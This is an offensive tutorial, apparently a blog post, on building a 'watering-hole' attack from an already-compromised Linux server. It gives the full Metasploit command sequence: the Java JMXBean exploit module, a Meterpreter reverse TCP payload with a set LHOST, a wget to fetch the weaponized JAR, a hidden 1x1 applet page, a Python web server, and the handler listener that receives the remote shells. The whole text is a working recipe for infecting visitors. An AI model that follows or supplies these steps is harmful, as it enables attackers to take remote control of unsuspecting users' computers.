Weaponizing a Java Archive file for offline use

In certain cases you may want to create a JAR file for offline use.  As an example, upon successful compromise of a Linux server, a "watering-hole" situation could be created by hosting a Java Meterpreter payloaded JAR file on the compromised system and pointing users to it.

In this case, the Java JMXBean 2 vulnerability which affects Java versions 1.7 and under will be leveraged.

Initialize Metasploit console 'msfconsole' and use:

use exploit/multi/browser/java_jre17_jmxbean_2

Set the payload (Java Meterpreter Reverse TCP):

set PAYLOAD java/meterpreter/reverse_tcp

Show and Set Options:

show options

The interest here is to just grab the JAR file from the Metasploit server.  Set the SRVHOST to 127.0.0.1.  However, keep in mind that the LHOST variable should be set to to point to the IP that will actually host the Meterpreter listener.  In this example, I set the LHOST to 10.0.0.10.

set SRVHOST 127.0.0.1

set LHOST 10.0.0.10

Now start the listener:

exploit

Take note of the URI path, it's randomized and will be different than the above screenshot.   Create a 'wget' request and grab the weaponized JAR.

wget http://127.0.0.1:8080/TneGeXfpn2/Archive.jar

We can now use Python to create a simple webserver to host the "watering-hole" landing page.  First, we create the 'index.html' file with embed code to invoke the JAR:

<html><head></head><body><applet archive="Archive.jar" code="Exploit.class" width="1" height="1"></applet></body></html>

Dump both the 'index.html' and 'Archive.jar' into a world readable directory.  From within that directory execute the Python command to launch the web server:

python -m SimpleHTTPServer 80

Don't forget to start your Metasploit listener on the machine you pointed the LHOST IP variable back to.

use exploit/multi/handler

set PAYLOAD java/meterpreter/reverse_tcp

set LHOST 10.0.0.10

exploit